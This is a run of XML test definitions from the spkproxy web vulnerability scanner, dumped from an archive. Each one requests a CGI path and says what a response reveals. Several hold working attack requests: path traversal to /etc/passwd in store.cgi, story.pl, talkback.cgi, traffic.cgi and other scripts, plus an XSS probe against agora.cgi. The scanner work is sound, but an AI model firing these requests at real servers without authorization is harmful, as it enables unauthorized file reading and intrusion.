http://google.com/ GET ${path}stats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1195.xml0100664000076500007650000000705207566204543021750 0ustar davedave (statsconfig) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}statsconfig HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1196.xml0100664000076500007650000000705007566204543021747 0ustar davedave (stats_old/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}stats_old/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1197.xml0100664000076500007650000000705207566204543021752 0ustar davedave (statview.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}statview.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1198.xml0100664000076500007650000000730307566204543021752 0ustar davedave (store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html) "This CGI allows attackers to read arbitrary files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1199.xml0100664000076500007650000000743707566204543021763 0ustar davedave (store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>) "Agora.cgi is vulnerable to Cross Site Scripting (XSS) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-119.xml0100664000076500007650000000711707566204543021665 0ustar davedave (test-cgi.bat) "This is an Apache for Win default. If Apache is lower than 1.3.23 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test-cgi.bat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1200.xml0100664000076500007650000000722007566204543021730 0ustar davedave (store/agora.cgi?page=whatever33.html) "Agora.cgi gives detailed error messages including file system paths." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}store/agora.cgi?page=whatever33.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ FILE\: 200 FILE\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1201.xml0100664000076500007650000000727207566204543021740 0ustar davedave (story.pl?next=../../../../../../../../../../etc/passwd%00) "story.pl versions older than 1.4 allow any file to be read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1202.xml0100664000076500007650000000730607566204543021737 0ustar davedave (story/story.pl?next=../../../../../../../../../../etc/passwd%00) "story.pl versions older than 1.4 allow any file to be read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}story/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1203.xml0100664000076500007650000000704007566204543021733 0ustar davedave (survey) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}survey HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1204.xml0100664000076500007650000000705007566204543021735 0ustar davedave (survey.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}survey.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1205.xml0100664000076500007650000000724407566204543021743 0ustar davedave (sws/admin.html) "Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sws/admin.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ manager\.pl 200 manager\.pl 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1206.xml0100664000076500007650000000705607566204543021745 0ustar davedave (tablebuild.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}tablebuild.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1207.xml0100664000076500007650000000732107566204543021741 0ustar davedave (talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1) "Talkback CGI displays arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1208.xml0100664000076500007650000000702707566204543021745 0ustar davedave (tcsh) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}tcsh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1209.xml0100664000076500007650000000743507566204543021751 0ustar davedave (technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd) "This CGI allows attackers to read arbitrary files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1210.xml0100664000076500007650000000707507566204543021741 0ustar davedave (test-cgi?/*) "This CGI allows files to read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test-cgi?/* HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ /tmp 200 /tmp 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1211.xml0100664000076500007650000000704407566204543021736 0ustar davedave (test.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1212.xml0100664000076500007650000000705607566204543021742 0ustar davedave (test/test.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test/test.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1213.xml0100664000076500007650000000723407566204543021741 0ustar davedave (testcgi.exe) "Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}testcgi.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1214.xml0100664000076500007650000000717107566204543021742 0ustar davedave (texis.exe/junk) "Texis Web Script gives system path/information when an invalid file is requested." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}texis.exe/junk HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Web Script 200 Web Script 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1215.xml0100664000076500007650000000716107566204543021742 0ustar davedave (texis/junk) "Texis Web Script gives system path/information when an invalid file is requested." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}texis/junk HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Web Script 200 Web Script 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1216.xml0100664000076500007650000000706007566204543021741 0ustar davedave (textcounter.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}textcounter.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1217.xml0100664000076500007650000000705607566204543021747 0ustar davedave (tidfinder.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}tidfinder.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1218.xml0100664000076500007650000000705207566204543021744 0ustar davedave (tigvote.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}tigvote.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1219.xml0100664000076500007650000000715307566204543021747 0ustar davedave (title.cgi) "HNS's title.cgi is vulnerable to cross site scripting (XSS CA-2000-02). in version 2.00 and earlier 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}title.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1220.xml0100664000076500007650000000704407566204543021736 0ustar davedave (tpgnrock) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}tpgnrock HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1221.xml0100664000076500007650000000736107566204543021741 0ustar davedave (traffic.cgi?cfg=../../../../../../../../etc/passwd) "Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1222.xml0100664000076500007650000000721207566204543021735 0ustar davedave (troops.cgi) "This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}troops.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1223.xml0100664000076500007650000000733207566204543021741 0ustar davedave (ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd) "Tarantell TTAWeb Top CGI lets remote users read arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1224.xml0100664000076500007650000000706007566204543021740 0ustar davedave (ultraboard.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ultraboard.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1225.xml0100664000076500007650000000705607566204543021746 0ustar davedave (ultraboard.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ultraboard.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1226.xml0100664000076500007650000000703107566204543021740 0ustar davedave (unlg1.1) "web backdoor by ULG" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}unlg1.1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1227.xml0100664000076500007650000000703107566204543021741 0ustar davedave (unlg1.2) "web backdoor by ULG" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}unlg1.2 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1228.xml0100664000076500007650000000726607566204543021754 0ustar davedave (update.dpgs) "Duma Photo Gallery System may allow remote users to write to any file on the system. See http://b0iler.eyeonsecurity.net for details. This could not be remotely tested." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}update.dpgs HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1229.xml0100664000076500007650000000712407566204543021746 0ustar davedave (upload.cgi) "The upload.cgi allows attackers to upload arbitrary files to the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}upload.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-122.xml0100664000076500007650000000705007566204543021653 0ustar davedave (.wwwacl) "Contains authorization information" 